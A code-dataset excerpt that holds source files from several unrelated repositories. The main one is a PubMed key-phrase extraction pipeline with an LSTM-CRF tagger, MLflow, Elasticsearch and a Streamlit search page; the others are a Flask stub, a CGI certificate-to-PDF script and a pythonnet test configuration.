"text": "# Key phrase extraction for scientific literature\n\nThis repo contains the end-to-end model for extracting key phrases from the records on PubMed in the mlflow folder. MLflow contain four modules that will execute the following four functions\n1. Collect records from PubMed with “search term”\n2. Preprocessing (generate tag sequence, extracting training dataset)\n3. Train model on the training set, report validation results\n4. Use trained model to extract keyphrases from records outside of training. Depending on the configuration, either store the records with extracted keyphrases in a JSON file, or push the records to the configured elasticsearch/kibana backend\n\nPlease be noted, the PubMed API wrapper has several unfixed bugs, MLflow has been configured to install an unofficial version published at https://github.com/iacopy/pymed/tree/fork-fixes. \n\nAnother part of the project involves building an elasticsearch/kibana backend and build a clio-lite powered contexual search engine on it. The docker-compose file for setting up the server and the code for building clio-lite based search engine (the official version of clio-lite does not support Elasticsearch version 7+ at the time, so an unofficial version at https://github.com/inactivist/clio-lite/tree/bugfix/fix-typeerror-basic-usage is used). You can find related files in the es folder.\n\nNotebooks used during the experimentation phase are included in the notebooks folder. You can find both LSTM and LSTM-crf models there. A different crf model that includes a context windows to explicitly consider the effects from nearby words is also in that folder, although this model does not perform better than the LSTM-CRF model (since LSTM already encompass this information).\n\n"
},
{
"alpha_fraction": 0.6740666031837463,
"alphanum_fraction": 0.6861755847930908,
"avg_line_length": 40.29166793823242,
"blob_id": "3a2c10312feab23a4041c62fcdb2a46862be5bbd",
"content_id": "453d3fc67f9ee4cf2bf909ab52bb5064d3f65b14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 991,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 24,
"path": "/es/cliosearch.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "from clio_lite import clio_search,clio_search_iter,clio_keywords\nimport streamlit as st\n# To make things easier later, we're also importing numpy and pandas for\n# working with sample data.\nimport pandas as pd\n\n\nst.title('Contextual Search for Multiple Sclerosis Records on PubMed')\nindex = st.text_input('Database for search', 'ms')\nquery = st.text_input('Search term', 'muitiple sclerosis')\nmaxr = st.text_input('max results', 25)\nurl = \"http://127.0.0.1:9200\"\nseoptions = st.multiselect(\n 'Which fileds to search?',\n [\"title\", \"abstract\", 'keywords'])\ntotal, docs = clio_search(url=url, index=index, query=query, fields=seoptions, limit=maxr)\nkeywords = clio_keywords(url=url, index=index, query=query,\n fields=seoptions,\n )\nst.markdown('Relted Key Phrases:')\nklist = ', '.join([kw['key'] for kw in keywords])\nst.text(klist)\nst.markdown('Results Table')\nst.table(pd.DataFrame(docs, columns=['PMID', 'title', 'keywords', 'pubdate']))\n"
},
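The same clio-lite calls can be used outside Streamlit. A minimal sketch mirroring the search in cliosearch.py above; the endpoint and the index name 'ms' come from that script, while the query string is arbitrary:

```python
from clio_lite import clio_search

url = "http://127.0.0.1:9200"   # local Elasticsearch, as in cliosearch.py
total, docs = clio_search(url=url, index="ms", query="multiple sclerosis",
                          fields=["title", "abstract"], limit=10)
print(total)
for d in docs:
    print(d.get("title"))
```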
{
"alpha_fraction": 0.5533769130706787,
"alphanum_fraction": 0.5627221465110779,
"avg_line_length": 37.082969665527344,
"blob_id": "4c015623f177fe2f8c86b9c0d69ae9d80f6e4f37",
"content_id": "05907b783a089926fbb472da598c8987beafd652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17442,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 458,
"path": "/mlflow/main.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "from pymed import PubMed\nimport mlflow\nfrom collections import defaultdict\nimport json\nimport ast\nimport spacy\nfrom spacy.matcher import PhraseMatcher\nimport pandas as pd\nimport torch\nfrom torch import nn\nimport time\nimport torchtext\nimport numpy as np\nfrom torchcrf import CRF\nimport subprocess\nimport mlflow.pytorch\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\n\n\[email protected](\"--search_term\", default='test',\n help=\"https://pubmed.ncbi.nlm.nih.gov/advanced/\")\[email protected](\"--max_records\", default=10000,\n help=\"Limit the data size to run comfortably.\")\[email protected](\"--json_out\", default='pmed.json',\n help=\"Name of the output JSON file\")\[email protected](\"--embvec\", default=1)\[email protected](\"--embvecache\", default='/home/pding/Documents/glove/')\[email protected](\"--val_ratio\", default=0.2)\[email protected](\"--rnnsize\", default=128)\[email protected](\"--batchsize\", default=310)\[email protected](\"--lr\", default=0.01)\[email protected](\"--weight_decay\", default=1e-5)\[email protected](\"--n_epochs\", default=15)\[email protected](\"--model_save\", default='model0.pt')\[email protected](\"--es\", default=1)\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef mainpipe(inputfile, search_term, max_records, json_out, embvec, embvecache, val_ratio, rnnsize, batchsize,lr, weight_decay, n_epochs, model_save, es):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n search_term = para['search_term']\n max_records = para['max_records']\n embvec = para['embvec']\n embvecache = para['embvecache']\n val_ratio = para['val_ratio']\n rnnsize = para['rnnsize']\n batchsize = para['batchsize']\n lr = para['lr']\n weight_decay = para['weight_decay']\n n_epochs = para['n_epochs']\n model_save = para['model_save']\n if embvec == 1:\n embvec = torchtext.vocab.GloVe(name='840B', dim=300, cache=embvecache)\n use_pretrained = True\n with mlflow.start_run() as mlrun:\n pubmed = PubMed(tool=\"AlphabetH\", email=\"[email protected]\")\n query = search_term\n results = pubmed.query(query, max_results=max_records)\n pp = defaultdict(lambda: defaultdict(dict))\n for art in results:\n pmed = art.pubmed_id\n try:\n pp[pmed]['title'] = art.title\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = art.abstract\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.conclusions\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.methods\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.results\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['keywords'] = art.keywords\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['authors']= art.authors\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['journal'] = art.journal\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['pubdate'] = str(art.publication_date.year)\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['conclusions'] = art.conclusions\n except(AttributeError, TypeError):\n pass\n print(subprocess.getoutput(\"python -m spacy download en_core_web_sm\"))\n artpd = pd.DataFrame.from_dict(pp, orient='index')\n artpda = artpd[artpd.abstract.notnull()].copy()\n artpda = artpda[artpd.title.notnull()]\n# artpda.index = pd.Series(artpda.index).apply(lambda x: 
x[0:8])\n artpdak = artpda[artpda.keywords.str.len() > 0].copy()\n dataf = pd.DataFrame(index=artpdak.index, columns=['SRC', 'TRG', 'keywords', 'Extracted', 'abskey'])\n dataf.loc[:, 'SRC'] = artpdak.title + ' ' + artpdak.abstract\n dataf.loc[:, 'keywords'] = artpdak.keywords\n svoc = spacy.load(\"en_core_web_sm\")\n matcher = PhraseMatcher(svoc.vocab, attr=\"LOWER\")\n for pmid in dataf.index:\n t0 = dataf.loc[pmid]\n patterns = [svoc.make_doc(str(name)) for name in t0.keywords]\n matcher.add(\"Names\", None, *patterns)\n doc = svoc(t0.SRC)\n t1 = ['O']*(len(doc))\n matched = []\n matn = 0\n for _, start, end in matcher(doc):\n t1[start] = 'B'\n t1[start+1:end] = 'I'*(end-start-1)\n if str(doc[start:end]).lower() not in matched:\n matn = matn+1\n matched.append(str(doc[start:end]).lower())\n abskw = []\n for x in t0.keywords:\n if x.lower() not in matched:\n abskw.append(x)\n dataf.loc[pmid, 'TRG'] = ' '.join([t for t in t1])\n dataf.loc[pmid, 'Extracted'] = matn\n dataf.loc[pmid, 'abskey'] = abskw\n matcher.remove(\"Names\")\n datatrain = dataf[dataf['Extracted']>=3].copy()\n datatest = dataf[dataf['Extracted']<3].copy()\n # separate train and validate\n dtrain = datatrain.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n seed = 250\n idx = np.arange(datatrain.shape[0])\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n np.random.shuffle(idx)\n val_size = int(len(idx) * val_ratio)\n df_train = dtrain.iloc[idx[val_size:], :]\n df_val = dtrain.iloc[idx[:val_size], :]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n df_test = datatest.loc[:,['SRC','TRG']]\n dtraink = datatrain.loc[:,['SRC','TRG','keywords']]\n df_val_k = dtraink.iloc[idx[:val_size], :]\n # Load original dataset\n datai = artpda.copy()\n datai = datai[datai.abstract.notnull()]\n datai = datai[datai.title.notnull()]\n datai = datai.replace('\\n',' ', regex=True)\n datai = datai.replace('\\t',' ', regex=True)\n dataiu = datai.loc[datai.keywords.str.len() ==0]\n dataik = datai.loc[datai.keywords.str.len() >0]\n dataiu['SRC'] = dataiu.title + ' '+ dataiu.abstract\n tokenizertrg = lambda x: x.split()\n\n def tokenizersrc(text): # create a tokenizer function\n return [tok.text for tok in svoc.tokenizer(text)]\n def safe_value(field_val):\n return field_val if not pd.isna(field_val) else \"Other\"\n def safe_year(field_val):\n return field_val if not pd.isna(field_val) else 1900\n TEXT = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, lower=False)\n LABEL = torchtext.data.Field(init_token='<bos>', eos_token='<eos>', sequential=True, unk_token=None)\n fields = [('text', TEXT), ('label', LABEL)]\n device = 'cuda'\n train_examples = read_data(df_train, fields, tokenizersrc, tokenizertrg)\n valid_examples = read_data(df_val, fields, tokenizersrc, tokenizertrg)\n # Load the pre-trained embeddings that come with the torchtext library.\n if use_pretrained:\n print('We are using pre-trained word embeddings.')\n TEXT.build_vocab(train_examples, vectors=embvec)\n else: \n print('We are training word embeddings from scratch.')\n TEXT.build_vocab(train_examples, max_size=5000)\n LABEL.build_vocab(train_examples)\n # Create one of the models defined above.\n #self.model = RNNTagger(self.TEXT, self.LABEL, emb_dim=300, rnn_size=128, update_pretrained=False)\n model0 = RNNCRFTagger(TEXT, LABEL, rnnsize, emb_dim=300, update_pretrained=False)\n\n model0.to(device)\n optimizer = 
torch.optim.Adam(model0.parameters(), lr=lr, weight_decay=weight_decay)\n train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model0, batchsize, optimizer,n_epochs)\n out2 = evaltest2(df_val, df_val_k, model0, tokenizersrc, fields, device)\n ttp3 = kphperct(df_val_k, out2,svoc)\n mlflow.log_param(\"epochs\", n_epochs)\n mlflow.pytorch.save_model(model0, model_save)\n mlflow.log_metric(\"extraction_rate\", ttp3.mean())\n augout = evaltest2(dataiu,model0, tokenizersrc, fields, device)\n klist = kphext2(dataiu.SRC,augout,svoc)\n for i in range(len(dataiu.index)):\n dataiu.iloc[i,2].extend(list(set(klist[i])))\n output = pd.concat([dataik,dataiu], join=\"inner\")\n output.to_json('/home/pding/OneDrive/kph/MSaug.json', orient='index')\n if es == 1:\n output['journal'] = output['journal'].apply(safe_value)\n output['conclusions'] = output['conclusions'].apply(safe_value)\n output['pubdate'] = output['pubdate'].apply(safe_year)\n output['PMID'] = output.index\n test_server = [{'host':'127.0.0.1','port':9200}]\n es = Elasticsearch(test_server,http_compress=True)\n use_these_keys = ['PMID', 'title', 'abstract', 'keywords','authors','pubdate']\n\n def filterKeys(document):\n return {key: document[key] for key in use_these_keys }\n \n def doc_generator(df):\n df_iter = df.iterrows()\n for index, document in df_iter:\n try:\n yield {\n \"_index\": 'ms',\n \"_source\": filterKeys(document),\n }\n except StopIteration:\n return\n helpers.bulk(es, doc_generator(output))\n print(ttp3.mean())\n\n\n\nclass RNNCRFTagger(nn.Module):\n \n def __init__(self, text_field, label_field, rnn_size, emb_dim, update_pretrained=False):\n super().__init__()\n \n voc_size = len(text_field.vocab)\n self.n_labels = len(label_field.vocab) \n \n self.embedding = nn.Embedding(voc_size, emb_dim)\n if text_field.vocab.vectors is not None:\n self.embedding.weight = torch.nn.Parameter(text_field.vocab.vectors, \n requires_grad=update_pretrained)\n\n self.rnn = nn.LSTM(input_size=emb_dim, hidden_size=rnn_size, \n bidirectional=True, num_layers=1)\n\n self.top_layer = nn.Linear(2*rnn_size, self.n_labels)\n \n self.pad_word_id = text_field.vocab.stoi[text_field.pad_token]\n self.pad_label_id = label_field.vocab.stoi[label_field.pad_token]\n \n self.crf = CRF(self.n_labels)\n \n def compute_outputs(self, sentences):\n embedded = self.embedding(sentences)\n rnn_out, _ = self.rnn(embedded)\n out = self.top_layer(rnn_out)\n return out\n \n def forward(self, sentences, labels):\n # Compute the outputs of the lower layers, which will be used as emission\n # scores for the CRF.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # We return the loss value. The CRF returns the log likelihood, but we return \n # the *negative* log likelihood as the loss value. \n # PyTorch's optimizers *minimize* the loss, while we want to *maximize* the\n # log likelihood.\n return -self.crf(scores, labels, mask=mask)\n\n def predict(self, sentences):\n # Compute the emission scores, as above.\n scores = self.compute_outputs(sentences)\n mask0 = sentences != self.pad_word_id\n mask = mask0.byte()\n # Apply the Viterbi algorithm to get the predictions. 
This implementation returns\n # the result as a list of lists (not a tensor), corresponding to a matrix\n # of shape (n_sentences, max_len).\n return self.crf.decode(scores, mask=mask)\n\ndef train(train_examples, valid_examples, embvec, TEXT, LABEL, device, model, batch_size, optimizer, n_epochs):\n\n\n # Count the number of words and sentences.\n n_tokens_train = 0\n n_sentences_train = 0\n for ex in train_examples:\n n_tokens_train += len(ex.text) + 2\n n_sentences_train += 1\n n_tokens_valid = 0 \n for ex in valid_examples:\n n_tokens_valid += len(ex.text)\n\n\n \n n_batches = np.ceil(n_sentences_train / batch_size)\n\n mean_n_tokens = n_tokens_train / n_batches\n\n train_iterator = torchtext.data.BucketIterator(\n train_examples,\n device=device,\n batch_size=batch_size,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=True,\n sort=True)\n\n valid_iterator = torchtext.data.BucketIterator(\n valid_examples,\n device=device,\n batch_size=64,\n sort_key=lambda x: len(x.text),\n repeat=False,\n train=False,\n sort=True)\n\n train_batches = list(train_iterator)\n valid_batches = list(valid_iterator)\n\n n_labels = len(LABEL.vocab)\n\n history = defaultdict(list) \n\n \n\n for i in range(1, n_epochs + 1):\n\n t0 = time.time()\n\n loss_sum = 0\n\n model.train()\n for batch in train_batches:\n\n # Compute the output and loss.\n loss = model(batch.text, batch.label) / mean_n_tokens\n\n optimizer.zero_grad() \n loss.backward()\n optimizer.step()\n loss_sum += loss.item()\n\n train_loss = loss_sum / n_batches\n history['train_loss'].append(train_loss)\n if i % 1 == 0:\n print(f'Epoch {i}: train loss = {train_loss:.4f}')\n mlflow.log_metric(\"train_loss\", history['train_loss'])\n\n\ndef evaltest2(df_val, df_val_k, model, tokenizersrc,fields,device):\n # This method applies the trained model to a list of sentences.\n examples = []\n for sen in df_val.SRC:\n words = tokenizersrc(sen)\n labels = ['O']*len(words) # placeholder\n examples.append(torchtext.data.Example.fromlist([words, labels], fields))\n dataset = torchtext.data.Dataset(examples, fields)\n\n iterator = torchtext.data.Iterator(\n dataset,\n device=device,\n batch_size=300,\n repeat=False,\n train=False,\n sort=False)\n\n # Apply the trained model to all batches.\n out = []\n model.eval()\n for batch in iterator:\n # Call the model's predict method. 
This returns a list of NumPy matrix\n # containing the integer-encoded tags for each sentence.\n predicted = model.predict(batch.text)\n\n # Convert the integer-encoded tags to tag strings.\n #for tokens, pred_sen in zip(sentences, predicted):\n for pred_sen in predicted:\n out.append([LABEL.vocab.itos[pred_id] for pred_id in pred_sen[1:-1]])\n return out\n\n\n\ndef kphext2(sentences,tags,svoc):\n kph = []\n for i in range(len(sentences)):\n s0 = svoc.tokenizer(sentences[i])\n s1 = [tok.text for tok in s0]\n t1 = tags[i]\n k1 = []\n for j in range(len(s1)):\n start = j\n if t1[j] == 'B':\n sti = 0\n stop = j+1\n while sti == 0:\n try:\n kt = str(t1[stop])\n if kt == 'I':\n stop = stop+1\n else:\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n except(IndexError):\n k2 = str(s0[start:stop])\n k1.append(k2)\n sti = 1\n k2 = str(s1[j])\n kph.append(k1)\n return kph\n\n\ndef read_data(df_train, datafields, tokenizersrc, tokenizertrg):\n examples = []\n words = []\n labels = []\n for pmid in df_train.index:\n words = tokenizersrc(df_train.loc[pmid,'SRC'])\n labels = tokenizertrg(df_train.loc[pmid,'TRG'])\n examples.append(torchtext.data.Example.fromlist([words, labels], datafields))\n return torchtext.data.Dataset(examples, datafields)\n\ndef tagperct(df_val,out):\n tp = np.empty(len(out))\n for i in range(len(df_val.index)):\n trg = tokenizertrg(df_val.iloc[i,1])\n total = 0\n for x in trg:\n if x != 'O':\n total = total+1\n matched = 0\n for j in range(total):\n if trg[j] != 'O':\n if trg[j]== out[i][j]:\n matched = matched + 1\n p = matched/total\n tp[i] = p\n return tp\n\n\ndef kphperct(df_val_k,out,svoc):\n tp = np.empty(len(out))\n for i in range(len(df_val_k.index)):\n ktrg = df_val_k.iloc[i,2]\n pred = kphext2([df_val_k.iloc[i,0]],[out[i]],svoc)\n k = 0\n for kp in ktrg:\n if str(kp).lower() in [str(x).lower() for x in pred[0]]:\n k = k+1\n tp[i] = k/df_val_k.iloc[i,3]\n return tp\n\n\nif __name__ == '__main__':\n mainpipe()\n"
},
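RNNCRFTagger above delegates its loss and its predictions to the pytorch-crf package. A minimal sketch of those two calls in isolation, using the same (seq_len, batch, n_labels) layout with random stand-in emission scores:

```python
import torch
from torchcrf import CRF

n_labels, seq_len, batch = 5, 7, 2
crf = CRF(n_labels)

emissions = torch.randn(seq_len, batch, n_labels)     # stand-in for the LSTM outputs
tags = torch.randint(0, n_labels, (seq_len, batch))
mask = torch.ones(seq_len, batch, dtype=torch.uint8)  # no padding in this toy batch

loss = -crf(emissions, tags, mask=mask)   # negative log likelihood, as in forward()
paths = crf.decode(emissions, mask=mask)  # Viterbi decoding: a list of tag-id lists
print(loss.item(), paths)
```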
{
"alpha_fraction": 0.5311614871025085,
"alphanum_fraction": 0.5336402058601379,
"avg_line_length": 35.20512771606445,
"blob_id": "91f2b4a21091222ee0381ff0447b9a93b72e4251",
"content_id": "87b237a7cbf4cc970e12f5ffc8631063f36a5bdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2824,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 78,
"path": "/mlflow/pmedpull.py",
"repo_name": "pchding/kph",
"src_encoding": "UTF-8",
"text": "from pymed import PubMed\nimport mlflow\nimport click\nfrom collections import defaultdict\nimport json\nimport ast\n\n\[email protected](help=\"Pull records from Pubmed for given search term\"\n \"Search term should follow the query format\")\[email protected](\"--search_term\", default='test',\n help=\"https://pubmed.ncbi.nlm.nih.gov/advanced/\")\[email protected](\"--max_records\", default=10000,\n help=\"Limit the data size to run comfortably.\")\[email protected](\"--save_json\", default='pmed.json',\n help=\"Name of the output JSON file\")\[email protected](\"--inputfile\", default=1,\n help=\"Whether to use the input.txt\")\ndef querysave(search_term, max_records, save_json, inputfile):\n if inputfile == 1:\n with open(\"input.txt\", \"r\") as f:\n para = ast.literal_eval(f.read())\n search_term = para['search_term']\n max_records = para['max_records']\n save_json = para['save_json']\n with mlflow.start_run() as mlrun:\n pubmed = PubMed(tool=\"AlphabetH\", email=\"[email protected]\")\n query = search_term\n results = pubmed.query(query, max_results=max_records)\n pp = defaultdict(lambda: defaultdict(dict))\n for art in results:\n pmed = art.pubmed_id\n try:\n pp[pmed]['title'] = art.title\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = art.abstract\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.conclusions\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.methods\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['abstract'] = pp[pmed]['abstract'] + art.results\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['keywords'] = art.keywords\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['authors']= art.authors\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['journal'] = art.journal\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['pubdate'] = str(art.publication_date.year)\n except(AttributeError, TypeError):\n pass\n try:\n pp[pmed]['conclusions'] = art.conclusions\n except(AttributeError, TypeError):\n pass\n with open(save_json, 'w') as fp:\n json.dump(pp, fp)\n\n\nif __name__ == '__main__':\n querysave()\n"
}
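The JSON written by querysave above maps PubMed IDs to field dicts. A sketch of what one entry might look like; the field names come from the code, while the PMID and all values are invented placeholders (the exact author structure depends on pymed's output):

```python
# Hypothetical shape of one pmed.json entry
{
    "12345678": {
        "title": "an invented article title",
        "abstract": "invented abstract, possibly with conclusions/methods/results appended",
        "keywords": ["keyword one", "keyword two"],
        "authors": [{"lastname": "Doe", "firstname": "Jane"}],
        "journal": "An Invented Journal",
        "pubdate": "2020",
        "conclusions": "invented conclusions text"
    }
}
```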
] | 7 |
Ralfs1/darbs2
|
https://github.com/Ralfs1/darbs2
|
bc48b2076bbef2a141f6cb7819f74ae86ba4a665
|
b66b7601300422086ad9f8f1ccc4793ec9404fd0
|
3671586a154edeb0239eac3bcb1f6a83c19c3b00
|
refs/heads/master
| 2023-04-07T02:23:50.609844 | 2021-04-12T08:52:34 | 2021-04-12T08:52:34 | 357,122,825 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5403226017951965,
"alphanum_fraction": 0.6048387289047241,
"avg_line_length": 4.952381134033203,
"blob_id": "50d5a0042154e5d56e7b632abe5e08774c20e8d0",
"content_id": "df489bededc4fa170b805126560af8fa0d036673",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 21,
"path": "/main.py",
"repo_name": "Ralfs1/darbs2",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\napp.run(host='0.0.0.0', port=8020)"
}
] | 1 |
wunderlins/CD_course
|
https://github.com/wunderlins/CD_course
|
295f26fceab066210d751b73faecfe074a5bfea3
|
73bfe6a248d514f51698bd36905eb6411d8130f9
|
c3a8b92da0e8166596d5b709a9c4448501eba164
|
refs/heads/master
| 2020-04-22T13:28:01.946444 | 2014-05-24T15:18:22 | 2014-05-24T15:18:22 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5965555310249329,
"alphanum_fraction": 0.6068156957626343,
"avg_line_length": 18.775362014770508,
"blob_id": "f2244e4ba9a3a0ed0845ccdd837e892b55d20b60",
"content_id": "56ed3fc0ad4bd2e5ac11f2c68bd904844bf109c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2729,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 138,
"path": "/cert.py",
"repo_name": "wunderlins/CD_course",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n# expect parameters as arguments\n# parameters (or equivalent cgi GET parameter):\n# 1 $$name$$\n# 2 $$title$$\n# 3 $$date$$\n# 4 $$location$$\n# 5 $$trainer$$\n\nimport sys, os\nfrom subprocess import call\n\nis_cgi = False\n#check if this is a cgi request\nif 'REQUEST_METHOD' in os.environ :\n\t# Import modules for CGI handling \n\timport cgi, cgitb \n\tcgitb.enable()\n\t# Create instance of FieldStorage \n\tis_cgi = True\n\ndef usage():\n\tprint \"\"\"\n\n# 1 $$name$$\n# 2 $$title$$\n# 3 $$date$$\n# 4 $$location$$\n# 5 $$trainer$$\n\"\"\"\n\ninkscape_bin = \"/usr/bin/inkscape\"\narg = [\"exe\", \"name\", \"title\", \"date\", \"location\", \"trainer\"]\n\ndef main(argv=None):\n\t\n\tif argv is None:\n\t\targv = sys.argv\n\t\n\tif (len(argv) < 6):\n\t\tprint(\"Argument error %d\\n\") % len(sys.argv)\n\t\tprint argv\n\t\tusage()\n\t\tsys.exit(1)\n\t\n\t# load svg template\n\ttemplate = \"./cert_cd_1_template.svg\"\n\tif (is_cgi):\n\t\tform = cgi.FieldStorage()\n\t\ttry:\n\t\t\ttemplate = form[\"template\"].value\n\t\texcept:\n\t\t\tpass\n\t\n\ttry:\n\t\tfp = open(template, \"r\")\n\texcept IOError as e:\n\t\tprint \"I/O error({0}): {1}\".format(e.errno, e.strerror)\n\t\tfp.close()\n\t\tsys.exit(1)\n\texcept:\n\t\tprint \"Unexpected error:\", sys.exc_info()[0]\n\t\tfp.close()\n\t\tsys.exit(1)\n\t\n\tbuffer = fp.read();\n\tfp.close()\n\t\n\t# subsitute values in svg\n\tfor (i, keyword) in enumerate(arg):\n\t\trepl = '$$' + keyword + '$$'\n\t\tbuffer = buffer.replace(repl, argv[i])\n\t\n\t# write temp svg file\n\tpid = os.getpid()\n\t\n\tfile_base = \"./tmp/out-%d\" % (pid)\n\tfile_svg = file_base + \".svg\"\n\t\n\ttry:\n\t\tfp = open(file_svg, \"wb+\")\n\texcept IOError as e:\n\t\tprint \"I/O error({0}): {1}\".format(e.errno, e.strerror)\n\t\tfp.close()\n\t\tsys.exit(1)\n\texcept:\n\t\tprint \"Unexpected error:\", sys.exc_info()[0]\n\t\tfp.close()\n\t\tsys.exit(1)\n\t\n\tfp.write(buffer)\n\tfp.close()\n\t\n\t# convert svg to pdf\n\t# /usr/bin/inkscape --export-pdf=FILENAME\n\tfile_pdf = file_base + \".pdf\"\n\tcall([inkscape_bin, \"--export-pdf=\"+file_pdf, file_svg])\n\tstatinfo = os.stat(file_pdf)\n\t\n\t# stream pdf result\n\tsys.stdout.write(\"Content-type: application/pdf\\n\")\n\tsys.stdout.write(\"Content-length: %d\\n\" % statinfo.st_size)\n\tsys.stdout.write(\"Content-disposition: inline; filename='CD_certifcate.pdf'\\n\\n\")\n\t\n\ttry:\n\t\tfp = open(file_pdf, \"r\")\n\texcept IOError as e:\n\t\tprint \"I/O error({0}): {1}\".format(e.errno, e.strerror)\n\t\tfp.close()\n\t\tsys.exit(1)\n\texcept:\n\t\tprint \"Unexpected error:\", sys.exc_info()[0]\n\t\tfp.close()\n\t\tsys.exit(1)\n\tprint fp.read()\n\tfp.close()\n\t\n\t# remove files\n\tos.remove(file_svg)\n\tos.remove(file_pdf)\n\t\nif __name__ == \"__main__\":\n\ta = None\n\tif (is_cgi):\n\t\tform = cgi.FieldStorage() \n\t\t\n\t\ta = [\"cgi\", \"\", \"\", \"\", \"\", \"\"]\n\t\t\n\t\tfor i in form.keys():\n\t\t\t#print i\n\t\t\ttry:\n\t\t\t\tix = arg.index(i)\n\t\t\t\ta[ix] = form[i].value\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\t\n\tsys.exit(main(a))\n"
}
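When not running as CGI, cert.py expects the five placeholder values as positional arguments (see its `arg` list) and streams the finished PDF, preceded by the CGI headers, to stdout. A hypothetical invocation; all argument values here are made up:

```python
import subprocess

# Argument order follows cert.py's `arg` list: name, title, date, location, trainer.
# Note the output also contains the Content-type headers before the PDF bytes.
with open("cert_output.bin", "wb") as out:
    subprocess.call(["./cert.py", "Jane Doe", "CD Course", "24.05.2014",
                     "Basel", "A. Trainer"], stdout=out)
```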
] | 1 |
zfq308/pythonnet
|
https://github.com/zfq308/pythonnet
|
bc7a5e2b1cbe6c7657f4a119a22d26f141831de9
|
d86880a81ee5e52eeb855cf93b452167c4aa5ddf
|
670960608656eedb9530e682af82d55d998bfbee
|
refs/heads/master
| 2021-01-21T07:00:20.067241 | 2017-02-22T17:02:53 | 2017-02-22T17:02:53 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6633266806602478,
"alphanum_fraction": 0.679358720779419,
"avg_line_length": 26.72222137451172,
"blob_id": "14fb61acdeb8b1aa52b3ea2ff4fcb74806e66882",
"content_id": "53433449196d1db3495290d7d82d1f76f43587c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 998,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 36,
"path": "/src/tests/conftest.py",
"repo_name": "zfq308/pythonnet",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# TODO: move tests one out of src to project root.\n# TODO: travis has numpy on their workers. Maybe add tests?\n\n\"\"\"Helpers for testing.\"\"\"\n\nimport ctypes\nimport os\nimport sys\nimport sysconfig\n\nimport clr\n\n# Add path for `Python.Test`\ncwd = os.path.dirname(__file__)\nfixtures = os.path.join(cwd, 'fixtures')\nsys.path.append(fixtures)\n\n# Add References for tests\nclr.AddReference(\"Python.Test\")\nclr.AddReference(\"System.Collections\")\nclr.AddReference(\"System.Data\")\n\n\ndef pytest_report_header(config):\n \"\"\"Generate extra report headers\"\"\"\n # FIXME: https://github.com/pytest-dev/pytest/issues/2257\n is_64bits = sys.maxsize > 2**32\n arch = \"x64\" if is_64bits else \"x86\"\n ucs = ctypes.sizeof(ctypes.c_wchar)\n libdir = sysconfig.get_config_var(\"LIBDIR\")\n shared = bool(sysconfig.get_config_var(\"Py_ENABLE_SHARED\"))\n\n header = (\"Arch: {arch}, UCS: {ucs}, LIBDIR: {libdir}, \"\n \"Py_ENABLE_SHARED: {shared}\".format(**locals()))\n return header\n"
},
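For context, the clr.AddReference calls above are the standard pythonnet way of making .NET assemblies importable from Python. A minimal sketch, independent of the test fixtures:

```python
import clr

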